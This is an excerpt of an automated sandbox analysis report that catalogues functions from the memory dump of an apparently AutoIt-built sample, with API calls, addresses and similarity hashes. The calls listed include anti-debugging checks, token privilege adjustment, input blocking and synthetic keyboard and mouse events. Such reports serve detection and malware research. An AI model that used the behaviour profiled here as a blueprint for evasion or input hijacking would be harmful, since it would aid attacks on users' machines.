                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LocalTime
                                                                                                                                                                                                                                                                                        • String ID: %.3d$X64
                                                                                                                                                                                                                                                                                        • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                                        • Opcode ID: 2be5c3d5167f6cb538c6a5eab8ff506333d470c327f2eb776b9043ce77e98ad5
                                                                                                                                                                                                                                                                                        • Instruction ID: 862661bfd25b5ad20ee3c97f81869f3bd7056b9f9938b26c4255a44c7ac71a26
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2be5c3d5167f6cb538c6a5eab8ff506333d470c327f2eb776b9043ce77e98ad5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7CD012B7C1811DD6CB88DB909D89EB9737CBB28381F604456FE4691000E6249A4DBB21
                                                                                                                                                                                                                                                                                        Function 00F32992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00F32A8A
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00F32A94
                                                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00F32AA1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ea4e67594f4804475691ca658b3bdd78b81a05fd49576b451f24b0b98753993a
                                                                                                                                                                                                                                                                                        • Instruction ID: 8f37a3042e7c61bf9a0f86218587984a17ffdecaedc7543969b555aef6c44e84
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea4e67594f4804475691ca658b3bdd78b81a05fd49576b451f24b0b98753993a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4931B77590122C9BCB61DF68DD8979DBBB8BF08310F5041DAE80CA7251EB349F859F45
                                                                                                                                                                                                                                                                                        Function 00F62010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00F209D8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F2014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00F209F5
                                                                                                                                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F6205A
                                                                                                                                                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F62087
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F62097
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 577356006-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cf28f2790a16b53aaaad89388b2630dc4eb86848bea8fa78031b7bbc1067e64e
                                                                                                                                                                                                                                                                                        • Instruction ID: 481d737aad2c17d6f5cb43d3901353ebffea4c456b6e2e36ce0d2ead80d9d46e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf28f2790a16b53aaaad89388b2630dc4eb86848bea8fa78031b7bbc1067e64e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6111CEB2800304BFD718AF64ECC6E6BBBB8EB04710B20842EF04653291EB74BC41DB20
                                                                                                                                                                                                                                                                                        Function 00F25058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,00F2502E,?,00FC98D8,0000000C,00F25185,?,00000002,00000000), ref: 00F25079
                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00F2502E,?,00FC98D8,0000000C,00F25185,?,00000002,00000000), ref: 00F25080
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00F25092
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ac51b29b5d52c5afc67bb8a6333e80ce3d6547ab299fa1075ce18767ec2b0230
                                                                                                                                                                                                                                                                                        • Instruction ID: 0e031271e28113bb7a7dac5ba716ff4f639dbbfcafb1a4de74b2a1d4ad30c387
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac51b29b5d52c5afc67bb8a6333e80ce3d6547ab299fa1075ce18767ec2b0230
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39E04632401508AFCF21AFA0ED08E483B6AEB10792F204014F8098A121DB3AED42EAC0
                                                                                                                                                                                                                                                                                        Function 00F6ECD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00F6ED04
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: mouse_event
                                                                                                                                                                                                                                                                                        • String ID: DOWN
                                                                                                                                                                                                                                                                                        • API String ID: 2434400541-711622031
                                                                                                                                                                                                                                                                                        • Opcode ID: 6c22df62016332b284cdfcab418beb793bba8a8c1fe1149d16e2d233ae74a959
                                                                                                                                                                                                                                                                                        • Instruction ID: fcb99053d51d0230f81d89be838700cc07567cbf9fcfc7b3489394b0df08092b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c22df62016332b284cdfcab418beb793bba8a8c1fe1149d16e2d233ae74a959
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97E08C2B1ED73639F98422187D07EF6234C8F22774B61428AF800E50C0EDA4AC82B5A9
                                                                                                                                                                                                                                                                                        Function 00F5E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00F5E664
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: NameUser
                                                                                                                                                                                                                                                                                        • String ID: X64
                                                                                                                                                                                                                                                                                        • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                                        • Opcode ID: b8a9abb2d3c9cb969ef4c4518e789c96e2b7a85eba39876af69e4ddcae7d9cba
                                                                                                                                                                                                                                                                                        • Instruction ID: 22598b2b87fa95c1b29d7cb6c4c87c3564b0663ae728f6c3e01019c796a5ea35
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b8a9abb2d3c9cb969ef4c4518e789c96e2b7a85eba39876af69e4ddcae7d9cba
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CD0C9B581511DEACB80CF50EC88EDD73BCBB14304F100652F546A2000D7309648AB10
                                                                                                                                                                                                                                                                                        Function 00F741FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00F852EE,?,?,00000035,?), ref: 00F74229
                                                                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00F852EE,?,?,00000035,?), ref: 00F74239
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b69dd73eaab059cf8e2e498239de8ebf914c06253a0e1920cc156e70f257cfcd
                                                                                                                                                                                                                                                                                        • Instruction ID: e6bdd7624c88359b7a4c9f1a498db4c7c873c8c9318de5650c295d36dfb5bc0e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b69dd73eaab059cf8e2e498239de8ebf914c06253a0e1920cc156e70f257cfcd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACF0E5316002286AE7201765AC4DFEB7A6DEFC5761F10017AF509D2181DA709A00E6B1
                                                                                                                                                                                                                                                                                        Function 00F6BBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F6BC24
                                                                                                                                                                                                                                                                                        • keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00F6BC37
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3536248340-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 9eea3db1b1ae2f03b090f6fbc4d886a1fb62571d38e7185000348d8352814d79
                                                                                                                                                                                                                                                                                        • Instruction ID: f18488bc425ea1ace4a73f6c47bc19a07ef6968937a2cb9b6f71027e1dfdc86d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9eea3db1b1ae2f03b090f6fbc4d886a1fb62571d38e7185000348d8352814d79
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C0F0677180024EABDB019FA4C806BBEBBB0FF08309F14800AF951EA192C7798201EF94
                                                                                                                                                                                                                                                                                        Function 00F61A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F61B48), ref: 00F61A20
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,00F61B48), ref: 00F61A35
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 81990902-0
                                                                                                                                                                                                                                                                                        • Opcode ID: e8697729050bf83f87da361e7612552d76ab7bd4af9401b7ce922400b72eb866
                                                                                                                                                                                                                                                                                        • Instruction ID: 689febeaee95b300ae4bea974b902757536e7a0636066e0e9a34503c916bf279
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e8697729050bf83f87da361e7612552d76ab7bd4af9401b7ce922400b72eb866
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65E0BF72014614BFF7252B60FC06F76B7A9FB04321F24891EF59580475DB666CA1EB50
                                                                                                                                                                                                                                                                                        Function 00F7F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • BlockInput.USER32(00000001), ref: 00F7F51A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: BlockInput
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 87aa033fa06ae6f8eefd88e5639c34c0bba70ebe77b6187f83c738aa5ef3cda2
                                                                                                                                                                                                                                                                                        • Instruction ID: 0c9dc726f7bc50c8d950ad65cb7db4baa18be10fa1db0ee70aa9ec2a24024a05
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87aa033fa06ae6f8eefd88e5639c34c0bba70ebe77b6187f83c738aa5ef3cda2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44E048326102045FC7109F69E804A56F7D8AFA4761F048426F849C7351D674F944ABA1
                                                                                                                                                                                                                                                                                        Function 00F20D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00F2075E), ref: 00F20D4A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 652806fda0dee330352fbbc96c872f07744f2033c70d891412047bd85d34a50c
                                                                                                                                                                                                                                                                                        • Instruction ID: 6b5213b7189adadef4a107a75f911c4a44a9718fae05eb52c627bd0c9df9646e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 652806fda0dee330352fbbc96c872f07744f2033c70d891412047bd85d34a50c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                        Function 00F8353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F8358D
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F835A0
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32 ref: 00F835AF
                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00F835CA
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00F835D1
                                                                                                                                                                                                                                                                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00F83700
                                                                                                                                                                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00F8370E
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F83755
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00F83761
                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F8379D
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F837BF
                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F837D2
                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F837DD
                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00F837E6
                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F837F5
                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00F837FE
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F83805
                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00F83810
                                                                                                                                                                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F83822
                                                                                                                                                                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00FA0C04,00000000), ref: 00F83838
                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00F83848
                                                                                                                                                                                                                                                                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00F8386E
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00F8388D
                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F838AF
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F83A9C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
